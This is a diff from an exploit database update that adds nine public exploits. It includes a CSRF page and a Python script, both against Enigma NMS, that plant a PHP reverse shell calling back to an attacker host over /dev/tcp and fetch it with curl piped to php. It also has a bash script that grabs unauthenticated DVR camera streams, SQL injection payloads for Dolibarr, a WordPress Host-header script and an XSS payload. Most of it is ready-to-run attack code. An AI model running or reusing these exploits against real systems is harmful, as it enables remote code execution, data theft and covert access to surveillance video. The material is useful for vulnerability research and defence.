DB: 2019-09-10

9 changes to exploits/shellcodes

WordPress 5.2.3 - Cross-Site Host Modification
Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection
Enigma NMS 65.0.0 - Cross-Site Request Forgery
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - SQL Injection
Online Appointment - SQL Injection
Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure
WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting
Dolibarr ERP-CRM 10.0.1 - SQL Injection

exploits/cgi/webapps/47368.sh

@@ -0,0 +1,75 @@
+#!/bin/bash
+#
+#
+# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
+#
+#
+# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
+# Product web page: http://www.rifatron.com
+# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
+#                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
+#                   Firmware: <=8.0 (000143)
+#
+#
+# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
+# servicing the security market as a leading CCTV/video surveillance security
+# system manufacturer, specializing in stand-alone digital video recorder since
+# 1998. We are known for marking the first standalone DVR with audio detection
+# and 480 frames per secone(fps) and have been focusing on highend products and
+# large projects in a variety applications and merket. These include government
+# and public services, banking and finance, hotels and entertatinment, retail
+# education, industrial and commercial sectors throughout Europe, Middle East,
+# the U.S. and Asia. Based on the accumulated know-how in the security industry,
+# Rifatron is trying its utmost for the technology development and customer
+# satisfaction to be the best security solution company in the world.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when animate.cgi script is called through Mobile Web Viewer module.
+#
+# Tested on: Embedded Linux
+#            Boa/0.94.14rc21
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5532
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
+#
+#
+# 03.09.2019
+#
+
+#{PoC}
+#
+set -euo pipefail
+IFS=$'\n\t'
+if [ "$#" -ne 2 ]; then
+    echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
+    echo "Ex.: $0 10.9.8.7:65432 10"
+    exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
+STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+    echo "Target not vulnerable!"
+    exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+    do echo -ne $x
+    curl "$HOST" -o sequence-$x.jpg -#;
+    sleep 0.6
+    done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc video.mp4 --verbose -1 -f vlc://quit
+#
+#{/PoC}

exploits/multiple/webapps/47363.html

@@ -0,0 +1,69 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16068                                            #   
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+
+The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
+
+<html>
+  <script>history.pushState('', '', '/')</script>
+  <script>
+    function submitRequest()
+    {
+      var xhr = new XMLHttpRequest();
+      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
+      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
+      xhr.withCredentials = true;
+
+      var body = "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"action\"\r\n" + 
+        "\r\n" + 
+        "system_upgrade\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
+        "\r\n" + 
+        "upload_file_complete\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
+        "Content-Type: application/x-php\r\n" + 
+        "\r\n" + 
+        "\x3c?php\n" + 
+        "\n" + 
+        "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
+        "\n" + 
+        "?\x3e\n" + 
+        "\r\n" + 
+        "-----------------------------208051173310446317141640314495\r\n" + 
+        "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
+        "\r\n" + 
+        "evil.php\r\n" + 
+        "-----------------------------208051173310446317141640314495--\r\n";
+
+      var aBody = new Uint8Array(body.length);
+      for (var i = 0; i < aBody.length; i++)
+        aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+    }
+    submitRequest();
+    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
+  </script>
+  <body onload="submitRequest();" >
+  </body>
+</html>

exploits/multiple/webapps/47364.py

@@ -0,0 +1,66 @@
+#!/usr/bin/python
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS OS Command Injection                     #
+# NETSAS Pty Ltd Enigma NMS                                          #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16072                                            #
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+
+import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+enigma_host = raw_input("Enter Enigma NMS IP address:\t")
+attack_host = raw_input("Enter Attacker IP address:\t")
+rev_sh_port = raw_input("Enter reverse shell port:\t")
+web_svr_port = raw_input("Enter web server port:\t\t")
+user = raw_input("Enter Username:\t\t\t")
+os.system("stty -echo")
+password = raw_input("Enter Password (no echo):\t")
+os.system("stty echo")
+	
+enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
+enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+
+print "\n\n[+] Building PHP reverse shell"
+f=open("evil.php","w")
+f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
+f.close()
+
+# Create simple webserver hosting evil php file
+print "[+] Hosting PHP reverse shell"
+web_svr_port = str(web_svr_port)
+web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)
+
+# Create netcat listener
+print "[+] Creating listener on port " + rev_sh_port
+subprocess.Popen(["nc", "-nvlp", rev_sh_port])
+
+# Send payload to Enigma NMS
+print "[+] Sending payload\n"
+try:
+    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
+except:
+    pass
+
+print "\n[+] Cleaning up mess..." 
+
+# Shut down http server
+os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)

exploits/multiple/webapps/47365.txt

@@ -0,0 +1,23 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS search_pattern SQL Injection             #
+# Date:  21 July 2019                                                #
+# Author: Mark Cross (@xerubus | mogozobo.com)                       #
+# Vendor: NETSAS Pty Ltd                                             #
+# Vendor Homepage:  https://www.netsas.com.au/                       #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
+# Version: Enigma NMS 65.0.0                                         #
+# CVE-IDs: CVE-2019-16065                                            #
+# Full write-up: https://www.mogozobo.com/?p=3647                    #
+#--------------------------------------------------------------------#
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/        -= Enigma SQLi by @xerubus =-    
+|   D _]/\ \     -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+
+Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
+Vulnerable Parameter:  search_pattern (GET)
+Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

exploits/php/webapps/47361.pl

@@ -0,0 +1,91 @@
+#!/usr/bin/perl -w
+#
+#  Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#  Type: Remote
+#  Risk: High
+#
+#  Solution:
+#  Set security headers to web server and no-cache for Cache-Control
+#  
+#  Simple Attack Scenarios:
+#  
+#     o  This attack can bypass Simple WAF to access restricted content on the web server,
+#        something like phpMyAdmin;
+#
+#     o  This attack can deface the vulnerable Wordpress website with content from the default vhost;
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#       # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#	# ====================================================================================
+#	# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
+#	# >  Host => default-vhost.com
+#	# >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+#	# >  Content-Type => application/x-www-form-urlencoded
+#	# <  Connection => close
+#	# <  Date => Fri, 06 Sep 2019 11:39:43 GMT
+#	# <  Location => https://default-vhost.com/
+#	# <  Server => nginx
+#	# <  Content-Type => text/html; charset=UTF-8
+#	# <  Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
+#	# <  Client-Peer => 13.37.13.37:443
+#	# <  Client-Response-Num => 1
+#	# <  Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
+#	# <  Client-SSL-Cert-Subject => /CN=default-vhost.com
+#	# <  Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
+#	# <  Client-SSL-Socket-Class => IO::Socket::SSL
+#	# <  Client-SSL-Warning => Peer certificate not verified
+#	# <  Client-Transfer-Encoding => chunked
+#	# <  Strict-Transport-Security => max-age=31536000;
+#	# <  X-Powered-By => PHP/7.3.9
+#	# <  X-Redirect-By => WordPress
+#	# ====================================================================================
+#
+#
+# 
+use strict;
+use v5.10;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+
+
+my $host = shift || '';
+my $attacker = shift || 'default-vhost.com';
+
+
+say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# ====================================================================================
+# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
+if ($host !~ m/^http/){
+say  "# e.g. perl $0 https://target:port/ default-vhost.com";
+exit;
+}
+
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(
+                                        protocols_allowed => ['http', 'https'],
+                                        ssl_opts => { verify_hostname => 0 }
+                                );
+   $browser->timeout(10);
+   $browser->agent($user_agent);
+
+my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
+$request->header("Host" => $attacker);
+my $response = $browser->request($request);
+say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
+say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
+say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
+say "# ====================================================================================";

exploits/php/webapps/47362.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+elemid (POST) - Sql injection PoC
+
+
+POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]
+
+
+
+Parameter: elemid (POST)
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+    Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
+(ELT(7549=7549,1))),0x7176787a71))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

exploits/php/webapps/47366.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Online Appointment SQL Injection 
+# Data: 07.09.2019
+# Exploit Author: mohammad zaheri
+# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+Online-Appointment-Booking-System-master/signup.php
+
+
+==========
+Vulnerable Source:
+==========
+Line 52: $name=$_POST['fname'];
+Line 53: $gender=$_POST['gender'];
+Line 54: $dob=$_POST['dob']; 
+Line 55: $contact=$_POST['contact'];
+Line 56: $email=$_POST['email'];
+Line 57: $username=$_POST['username'];
+Line 58: $password=$_POST['pwd'];
+Line 59: $prepeat=$_POST['pwdr'];
+Line 62: if (mysqli_query($conn, $sql)) 
+
+=========
+POC:
+=========
+http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @m_zhrii
+Email : neoboy503@gmail.com

exploits/php/webapps/47369.txt

@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: September 09,2019
+# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
+# Software Link : https://wordpress.org/plugins/sell-downloads/
+# Tested Version: 1.0.86
+# Tested on: Parrot OS, Wordpress 5.1.1
+
+
+# PoC:
+1- Go to "Products for Sale" section
+2- Click on "Add New"
+3- In opend window click on "Add Comment"
+4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
+5- Click on "Publish" (or "Update" if you editing an existing product)
+6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.

exploits/php/webapps/47370.txt

@@ -0,0 +1,140 @@
+# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+actioncode (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 610
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+
+
+Parameter: actioncode (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
+0x28 END))--
+HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
+(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
+jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+.
+.
+.
+.
+.
+
+demand_reason_id, availability_id (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 471
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+
+
+Parameter: demand_reason_id (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
+END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+.
+.
+
+Parameter: availability_id (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
+END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+AND (SELECT 9904 FROM
+(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

files_exploits.csv

@@ -41708,3 +41708,12 @@ id,file,description,date,author,type,platform,port
 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
+47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
+47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
+47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
+47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,
+47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,
+47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
+47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,
+47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,